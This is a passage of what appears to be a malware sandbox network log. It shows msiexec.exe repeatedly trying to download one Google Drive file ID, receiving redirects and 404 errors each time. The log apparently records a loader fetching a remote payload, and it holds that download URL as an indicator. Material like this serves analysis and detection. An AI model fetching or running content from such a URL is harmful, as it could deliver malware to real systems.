Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49988	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:08:53 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:08:53 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgS4ryeFUyhwFjuOpt6QYUDgjoJi2VBccicqu5ufWYumIdgroJUCSj8mM19r44ZVx4k1 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:08:53 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-U86fOgIHl5pQjiCls8rkPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:08:53 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 32 6d 73 6b 4b 45 7a 34 45 6d 37 37 39 33 36 45 6c 6a 69 64 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="p2mskKEz4Em77936Eljidw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49989	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:08:54 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:08:54 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:08:54 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-CYulXXDBulyetM2g8KyAyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49990	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:08:55 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:08:56 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRqF2IYrqX7cDZUoXqxfCyMv2WOiCJjvTb1rg5ymgcQsaObGM9uFj1TbuhxWhkX98EfD04dlYQ Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:08:55 GMT Content-Security-Policy: script-src 'nonce-mXOwVsDROoX8Z-deesKbMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:08:56 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 41 34 38 35 65 74 59 74 49 73 78 38 43 39 37 50 63 64 75 77 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uA485etYtIsx8C97PcduwA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49991	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:08:56 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:08:57 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:08:57 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-IMqCZIBk4vtxpUhXsqq82w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49992	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:08:57 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:08:58 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6O_xi4eK0zYRESZytb29lZeZvY-qdXFCl6Zq1OlDyhx41r-2L-gopBxSuPSfk-5Bhk Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:08:58 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-GQ0bSoF1BR3qls8a4lx-lQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:08:58 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 57 51 62 41 69 7a 2d 47 45 4c 41 41 4b 62 6f 4d 78 4a 68 78 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8WQbAiz-GELAAKboMxJhxw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49993	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:08:59 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:08:59 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:08:59 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-QotTisZVhqpa2ZEN0AerSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49994	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:00 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:00 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC750KnAA9VlVDqhnFQF1NlRG2LXgwFCaiEhIttJscnGJYEfwbhNr-GcmZJ3LPXyqtCI Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:00 GMT Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-hLedHVU96__ZeWHD_hLiWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:00 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 76 4f 75 58 79 5f 59 76 67 51 49 36 5f 48 49 56 63 4e 47 7a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jvOuXy_YvgQI6_HIVcNGzA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49995	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:01 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:01 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:01 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-MX82P1Hisy79oVKS0t-kgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49997	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
